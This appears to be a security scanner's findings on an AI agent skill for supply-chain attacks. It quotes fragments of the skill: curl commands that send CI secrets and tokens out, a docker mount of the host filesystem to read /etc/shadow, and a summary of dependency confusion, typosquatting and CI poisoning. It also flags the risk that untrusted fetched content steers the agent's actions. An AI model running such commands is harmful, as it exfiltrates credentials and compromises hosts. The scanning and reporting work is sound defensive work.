supply-chain-attack

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). The prompt contains explicit examples that copy CI/secrets into exfiltration commands (e.g., curl -d "token=${{ secrets.DEPLOY_TOKEN }}" and curl ...?key=$CI_JOB_TOKEN"), which instruct an agent to include secret values verbatim in generated outputs, creating an exfiltration risk.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is a high-risk, explicitly malicious playbook: it provides step-by-step supply‑chain attack techniques (dependency confusion, typosquatting, CI/CD poisoning) and includes concrete payloads and commands that perform data exfiltration, credential theft, remote code execution, runner/host escape, and persistence, clearly enabling unauthorized compromise.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The SKILL.md and referenced docs explicitly instruct fetching and parsing untrusted public web content (e.g., "curl -s https://target.com | grep -oE ..." in Phase 1 and numerous GitHub/GitLab/npm/PyPI/Maven curl/npm view checks in references/dependency-confusion.md and references/cicd-attack.md), and those external results are used to decide and drive subsequent attack actions, so third‑party content can materially influence tool use and next steps.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs actions that compromise machine state and data (e.g., modifying CI config, publishing malicious packages with install-time callbacks, and mounting the host filesystem via docker run -v /:/host to read /etc/shadow and exfiltrate secrets), which would actively compromise the agent's host if executed.